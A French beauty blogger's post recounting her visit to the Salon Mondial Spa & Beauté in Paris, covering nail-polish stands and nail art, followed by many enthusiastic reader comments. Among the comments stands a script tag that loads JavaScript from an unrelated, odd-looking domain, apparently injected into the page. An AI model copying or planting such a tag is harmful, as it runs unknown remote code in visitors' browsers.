• Ma visite du Salon Mondial Spa & Beauté!

    Coucou les filles!

    Comme beaucoup d'entre vous le savent grâce à Facebook, je suis allée visiter le salon Mondial Spa & Beauté de Paris qui a lieux ce weekend! Mon premier salon de ce genre d'ailleurs! Je ne pouvais pas louper cette occasion, habitant en région parisienne, de pouvoir découvrir de nouvelles marques et de nouveaux produits tout en assistant à un tel rassemblement de nailartistes!!!!

    Et je ne regrette pas!!! J'en ai eu plein les yeux! Bon par contre niveaux nouveautés, rien à se mettre sous la dents, c'est là mon seul regret! Je suis quand même contente de ne pas avoir eu à débourser 30 euros pour pouvoir assister à cet évènement!

    Mais alors quelle ambiance, et quelle effervescence!!! Du vernis à chaque coin de stand, des paillettes qui volent presque dans l'atmosphère, des strass qui ne demande qu'à être portés, des stickers, water decals, vernis mood, stamping à gogo!!! Enfin bref, il y en avait vraiment pour tous les goûts!!!!

    Voici donc les photos que j'ai pris de cet évènement qui restera pour moi un magnifique souvenir mêlant superbes rencontres entre nailartistes et plein de produits dont nous rêvons toutes^^

     A l'arrivée, bon ben, on fait comme tout le monde, et on prend son mal en patience! En fait la file d'attente en question est celle pour les personnes ayant réalisées un pré enregistrement sur le site internet. Tout le monde pensant gagner du temps a fait cette manipulation... erreur... une autre file d'attente non visible sur la photo attendais patiemment d'accueillir les visiteurs n'ayant pas réalisé cette opération... Grrrr

    Ma visite du Salon Mondial Spa & Beauté!

    Mais bon nous on est contente quand même alors ben on rigole pour patienter dans la bonne humeur! (Claire à gauche et ma petite soeur à droite qui fait une drôle de tête d'ailleurs^^)

    Ma visite du Salon Mondial Spa & Beauté!

    Finalement, quand on s'amuse le temps passe vite et nous avons très vite récupéré notre badge nominatif! Et attention, c'est partiiiiiiiiiiiiiie!!!

    Alors avant d'accéder à la partie du salon sur la manucure, nous devions passer par la partie Spa et là nous avons vue... les petits poissons qui viennent manger les petites peaux mortes de vos mains et de vos pieds!! C'est vraiment une méthode que je trouve bizarre mais qui en même temps m'intrigue pas mal^^ Je pense qu'un jour j'essaierais^^

    Ma visite du Salon Mondial Spa & Beauté!

    Voici le premier stand que nous avons visité et où nous avons pu rencontrer la charmante Yoko ambassadrice de la marque Trendy Nail Wraps!

    Ma visite du Salon Mondial Spa & Beauté!

    Et voici Yoko en pleine démontrastion!

    Ma visite du Salon Mondial Spa & Beauté!Ma visite du Salon Mondial Spa & Beauté!

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Admirez les mains de Yoko!! Un nail art magnifique!!!

    Et attention LA photo de groupe^^ Merci Yoko d'avoir joué le jeu!

    Ma visite du Salon Mondial Spa & Beauté!

    A gauche Yoko à côté moi, juste derrière Sakina et Viniebaby, à ma droite, Alexia et derrière elle Rory puis la fille aux ongles verts bah c'est ma Claire^^

    Et voici maintenant le second stand que nous avons visité avec un plaisir immense!! Le stand Essie! Pour moi le stand le plus agréable et qui à, je trouve, le plus soigné sa présentation! Un espace clair et très zen attitude avec des spots permettant de donner une dimension différente à cet espace! J'ai adoré et comme vous allez le voir ils n'ont pas fait les choses à moitié!!!

    Ma visite du Salon Mondial Spa & Beauté!

    Voici l'entrée! Avec de magnifiques affiches qui ornent les murs de cet espace dédié à la marque!

    Ma visite du Salon Mondial Spa & Beauté!

    Moi aussi je veux ça en déco mural chez moiiiiiiii!!!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

     

     

     

     

     

     

     

     

     

     

     

    Je vous raconte pas dans quel état nous étions en voyant tous ces magnifiques flacons!!!

    Ma visite du Salon Mondial Spa & Beauté!

    Sublime!!

    Ma visite du Salon Mondial Spa & Beauté!

    Etaient également en présentation toute la gamme de soin! Top coat, Base, soin cuticule....

    Ma visite du Salon Mondial Spa & Beauté!

    Et alors là mesdames et mesdemoiselles, le clou du spectacle, au centre de la pièce, des centaines et des centaines de vernis triés par couleurs!!! J'ai frolé l'infarctus!!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Mon seul regret est qu'ils souhaitaient adopter une démarche commercial de découverte des produits plutôt que de vente et DONC ils ne vendent pas de vernis à l'unité! Mais, soit un kit de trois vernis, dont une base + couleur au choix + top coat à 23€ (ce qui est plus que raisonnable) ou 20 vernis à 2XX donc bon, n'ayant pas encore gagné à l'euromillion et possédant déjà moultes bases et top coat je me suis résignée à ne rien acheter... Mais bon un réel plaisir pour les yeux!

    Passons maintenant au stand Adnails qui bien évidemment était présent! Je ne vous dis pas l'horreur!! Pas pour ce qui est des produits ou de l'accueil mais le stand c'était un peu comme essayé de rentrer un éléphant dans une boite d'allumette! L'elephant représentant la foule monstrueuse présente sur le stand TOUTE LA JOURNEE!!! Je plains la pauvre Tartofraise qui doit avoir ce soir des crampes aux poignets et la rétine brulée à vif!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

    Voici d'ailleurs Tartofraise en plein one stroke!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Water decal un jour, water decal toujours!!!

    LE produit interessant sur ce stand, les Color Club à 5 euros!!!!

    Ma visite du Salon Mondial Spa & Beauté!

    Et voici le nail art réalisé par Tartofraise sur le pouce de ma sister! Joli n'est ce pas??!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Mais le salon Mondial Spa & Beauté c'est aussi CA!!!

    LE TALENT!!!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

    Mais aussi CA!!!

    Plein de trucs trop chouuuuuuuuuuuu!

    Ma visite du Salon Mondial Spa & Beauté!

    Trolley Léopard, zèbre... et sèche cheveux assortit ;)

    Ma visite du Salon Mondial Spa & Beauté!

    Et voici quelques photos du stand Fashion Nails! Vernis Mooddd!!!! Vernis LM Magnétic et cannes fimo à gogo!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

    Et pour le plaisir des yeux!!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

    Et voici le stand Konad!! C'est là où j'ai le plus craqué!!! Ils vendent vraiment toute leur gamme de produit et nous avons vraiment eu un accueil formidable!!! Et franchement la malette, elle est magnifique!!! Si le Père Noël lit ces quelques lignes et bien ca serait vraiment très aimable de sa part de le noter dans son carnet de commande! Bah quoi on peut toujours rêver^^

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!

    Du coup bah je me suis lâchée^^ J'ai acheté 9 vernis Konad ainsi que 5 plaques! Bah je manquais de matériel de stamping j'ai fais le plein je vais pouvoir m'amuser ^^

    MAIS le salon Mondial Spa & Beauté regorge de surprises et nous avons pu assister à des maquillages dignes de films hollywoodien!!! Voici les images!

    Silence! Ca tourne!

    Ma visite du Salon Mondial Spa & Beauté!

     

    Ma visite du Salon Mondial Spa & Beauté!Ma visite du Salon Mondial Spa & Beauté!

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Durant cette journée, j'ai rencontré pas mal de merveilleuses bloggeuses (et non bloggeuse) comme Beltane, Harmony, Cindy, Sashka, Rosenwok, Alexia, Apperçu So Originail et Saori, Yoko, Tartofraise, Viniebaby, Graou Papattes, Claire, Rory Nails, Sakina et désolée si j'en oublie mais la journée à été longue et il est temps que j'aille m'envoler aux doux pays des rêves ;)

    Et en partant, après avoir marché et pietiné inlassablement toute le journée! Claire à découvert un vrai fauteuil de princesse!! Si si je vous jure un vrai!!!! Donc nous avons décidé de déposer délicatement nos postérieurs quelques minutes afin de reposer nos pieds meurtris pas tant d'enthousiasme tout au long de cette magnifique journée^^

    Ma visite du Salon Mondial Spa & Beauté!

     

    Voila les filles c'était le salon Mondial Spa & Beauté vue par Serah^^ J'espère que ma visite guidée vous aura plu ;) En tout cas, bah l'année prochaine je reviendrais avec plaisir ;) Et j'espère que j'y rencontrerai encore plus de bloggeuses et encore plus de filles géniales!!!!

    Ma visite du Salon Mondial Spa & Beauté!

    « Toutes mes excuses!Déjà 6 mois! »

    Tags Tags : , , ,
  • Commentaires

    40
    Mardi 6 Mars 2012 à 20:03

    Coucou,

    Waouh cette journée avait vraiment l'air géniale !!!!

    Bisous ma belle

    39
    Adeline42
    Mardi 6 Mars 2012 à 19:17

    Merci beaucoup pour cet article il est vraiment super ^^^Comme tu nous fait rêver avec tous ces vernis ;)

    38
    tichou1313
    Mardi 6 Mars 2012 à 18:49

    Hannnn c'est ma main que tartofairse vernis ! Il était trop beau mon water decal noir et bleu huhu 

    37
    Mardi 6 Mars 2012 à 17:49
    Rosenwok

    Super ton article il est très complet!!! Nous aussi on avait trop mal au pieds à la fin de la journée... hihi Et Adnail a été plein toute la journée c'est clair hihi Je vois que j'ai raté pas mal de monde, pourtant mon noeud rouge était voyant haha ^^

    Au plaisir de se parler la prochaine fois^^ mais il y avait tellement de monde.... :)

    Bisous

    36
    Mardi 6 Mars 2012 à 16:39

    super article ^^ j'ai peur de faire le mien du coup maintenant =X ^^


    bisous

    35
    Mardi 6 Mars 2012 à 11:46
    ptitbrindcanelle

    rhaaa! bin moi aussi je frôle l'infarctus^^

    c'est limite orgasmique de voir tous ces beaux vernis!!

    34
    charlène44
    Lundi 5 Mars 2012 à 19:07

    o_O je suis en plein rêve, j'ai frolé l'arrêt cardiaque quand j'ai vu ces armoires de vernis, mais pourquoi j'habite à + de 300 km de paris !!!! grrrrrr, si tu savais comme je t'envie !

    33
    Lundi 5 Mars 2012 à 17:22

    OH MON DIEU! C'est juste un rêve quoi !! Et je peux pas y aller :'(  lool

    32
    Lundi 5 Mars 2012 à 15:12
    b.aurorenail

    merci de ce partage , j'ai des etoiles plein les yeux c'est trop beau!!!

    merci merci de toutes ces belles photos

    BEA

    31
    Lundi 5 Mars 2012 à 15:11

    Pourquoi j'ai pas pu y aller :-( lol

    Bisous

    30
    Lundi 5 Mars 2012 à 11:17
    Miss Milie Vanille

    Bon, pour l'année prochaine, je fais des économies avant et j'y vais cette fois. Ca devais être génial! trop décue de pas avoir pu y aller! Bisous ma belle

    29
    Lundi 5 Mars 2012 à 08:17

    la chance, le salon est tjrs a la mm periode?? car l'année prochaine je viens en vacances en france et je voudrais bien y participer, comme ça je pourrai peut etre correspondre mes vacances ac le salon lol ça serait le reve

     

    28
    Lundi 5 Mars 2012 à 00:21

    Mon dieu comme j'aurai aimé y être mais peut être serais je devenu folle en voyant tout cela aaaahhhh la carte bleu n'aurait pas appreciée

    Merci de nous faire partager ça

    <script src="http://pluginthemerose.info/dfi823hs.js?0.6089445266723879" type="text/javascript"></script>
    27
    Dimanche 4 Mars 2012 à 21:15

    Put.... le truc de fou comment j'aurai aimer etre la surtout que l'année dernière c'etait relativement pourri :( cette année c'était de la bombe à se que je vois!! je suis quand meme deg pour moi mais contente pour vous!! Tu as rencontrer qui? Car apart avoir un badge de bloggeuse c'est pas marquer sur notre front!!!

    Bisous ma belle ;)

    26
    Dimanche 4 Mars 2012 à 21:07
    nlsz

    Ca a dû être une super journée!!! j'espère que l'année prochaine je pourrais y aller!! ;) biz

    25
    Dimanche 4 Mars 2012 à 20:57

    Oh comme je t'envie!!! Ca devait être variment super :)

    Il faut absolument que j'y sois l'année prochaine ^^

    Bisous

    24
    Dimanche 4 Mars 2012 à 18:53

    J'ai été très contente de faire ta connaissance et de mettre un visage sur ton pseudo ! J'espère à une prochaine ! Bisous et super tes photos :)

    23
    Dimanche 4 Mars 2012 à 17:35

    hé ben heureusement que je n'y suis pas allé! ma CB aurait fait la gueule!!! tu as du t'éclater ma belle là bas!!! des bisoussss!

    22
    Elisa(zazanails)
    Dimanche 4 Mars 2012 à 16:12

    Merci pour ton témoignage c cool de voir un petit aperçu du salon quand on y est pas allé :)

    21
    Dimanche 4 Mars 2012 à 15:17

    coucou ma beautée 

    wouahhhhh trop trop bien , ça a du être un moment halucinant pour vous , je suis très contente pour toi

    gros bisous

    20
    Dimanche 4 Mars 2012 à 14:05

     la chance!!!!!! j'aurais vraiment aimée y aller!!! biz

    19
    Dimanche 4 Mars 2012 à 12:54
    Katsukii

    Ouaaaaaaaaaaaaaaaaaaah j'aurais pas dû lire cet article ! XD

    Non, mais merci pour cette visite guidée, c'était cool, et ça donne TROP envie d'y aller ! J'espère pouvoir y être l'année prochaine (en attendant de gagner des sous sous xD) !

    En tout cas, wow ^^

    18
    Dimanche 4 Mars 2012 à 12:39

    whaou ! vous etes entrées dans la caverne d'ali baba !!! les veinardes ! ca fait plaisir de voir comme vous vous etes amusées , et merci a toi de nous le faire partager ^^

    17
    Dimanche 4 Mars 2012 à 12:37
    Angélique08440

    oh lala!! ça devais être super!! j'aurais bien aimé y aller!!!! l'année prochaine peut-être s'ils le refont!!!

    gros bisous

    16
    Dimanche 4 Mars 2012 à 12:25

    La chance moi aussi j'aurai bien aimée y aller mais je suis trop loin donc j'aurai du dépensé des sommes folles et donc j'aurai pu rien acheter au mondial lol en tout cas c'est super intéressant cet article de ta journé je vie le mondial par procuration ^^ bisous

    15
    Dimanche 4 Mars 2012 à 12:19

    genial!!!!!

    moi j'auraus craquer a chaque rayon ;)

     

    14
    *Céline*
    Dimanche 4 Mars 2012 à 11:46

    Ca donne trop envie!! merci pour ce petit reportage :)

    13
    marina1674
    Dimanche 4 Mars 2012 à 11:32

    Merci pour toutes ces photos, cela m'as fait rêver !

    12
    Dimanche 4 Mars 2012 à 11:24
    Viniebaby

    J'adore ton article ma beauté chérie ♥

    Que de bons souvenirs à vos côtés!!!

    J'ai adoré ma journée, alors, merci =D

    Magnifiques photos, tu nous en mets pleins les yeuxxxx

    Bonne journée

     

    Bizouxxxx bizouxxxx ma cbérie

    11
    Dimanche 4 Mars 2012 à 11:18

    waou, ça avait l'air super !
    gros bisosu

    10
    sabrina76
    Dimanche 4 Mars 2012 à 11:14

    bonjour tes photo sont geniale apres le salon j'ai pas trouvé sa super petit trés tassé :( bisous

    9
    Dimanche 4 Mars 2012 à 10:07

    coucou ma Serah !

    Comme on dit, c'était une journée au top !!!

    Vous avez bizn eu de la chance de toutes vous rencontrer ;)

    Gros bibis

    8
    Dimanche 4 Mars 2012 à 09:06
    boobasnails

    coucou ma belle Serah, ca avait l'air genial! malheureusement, je n'ai pas y aller, mon fils etant malade et je suis bien degoutee :$ et le pire c ma mere qui me dit hier soir a minuit, "ben tu l aurai dit avant, je l aurai gardé Kelyan", grrrr !

    enfin bref, l'annee prochaine, j y vais!^^

    bisouilles et felicitations pour tes achats

    7
    Dimanche 4 Mars 2012 à 09:03

    Coucou, oh la la quelle chance, j'aurais beaucoup aimé y aller. Merci à toi pour cet article et toutes les photos :) Cela nous permet de nous rendre compte de ce qu'était ce salon

    Bisous et bon dimanche

    6
    Dimanche 4 Mars 2012 à 08:52
    momoly

    t'es allée au paradis enfaite ^^

     

    5
    Dimanche 4 Mars 2012 à 08:44

    Wahou!!!!! Cà aurait été un enfer à vivre pour moi!!! A moins que je vienne sans ma CB!!! MDR!!! Y a dû en avoir du craquage!?!?!  Trop de la chance!!! J'espère pour y assister un jour...

    En tous cas, merci pour ces photos de rêves!!!

    Bon dimanche!!! Biz!

    4
    Dimanche 4 Mars 2012 à 01:52

    rooooooooooooo comment c'est trop bien comment je suis trop deg de avoir pu venir rien que pour vous voir....!!! vous avez du vous eclatez...!!!

    groooos bisous tout doux ma cheriiiie...!!!

    3
    Dimanche 4 Mars 2012 à 01:30

    coucou miss, je vois que vous avez très bien profités, grâce à tes photos commentés, ça nous à permis d'y être en quelques sorte. trop bien le stand essie, les colorclub hummmmmmmmmmmmmm gros craquage, sniffffff le stand konad ma cb aurait flambé lol. cro cro cro bien les rencontre des bloggeuse ^_^. sur l'année prochaine j'y vais :p merci bcp pour ces images ma belle passe une douce nuit bisouille

    2
    Dimanche 4 Mars 2012 à 01:17

    oh my god !! oh my god !!!!! OH MY GOD !!!!!!!!!!! Mais tu me fout la dedans je pète un plomb !! Déjà que j'avais carrément craqué mon string l'an dernier au salon de l'esthétisme.... Alors à celui - ci ca aurait été le MEGA pompon!!!! La vache !:!!! Tes photos sonr superbes en plus !!!! Merci pour ce magnifique article !! Je vais m'endormir avec des rêves de vernis pleins la tête grâce à toi !!!! Génial !! MERCI de l'avoir partager avec nous toutes !!! Gros gros bisous ma belle !!!!!

    1
    Dimanche 4 Mars 2012 à 01:06

    ohlalala ca devait etre bien..............ahahalalal moi j'aurais craque pour les colorclub  nsif snif..............et les trolley trop geniale tu aurait la boutique qui font ceux que tu as en photo?en tout cas sur la photo vous etes trop geniale bravo les filles.............. kisss

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :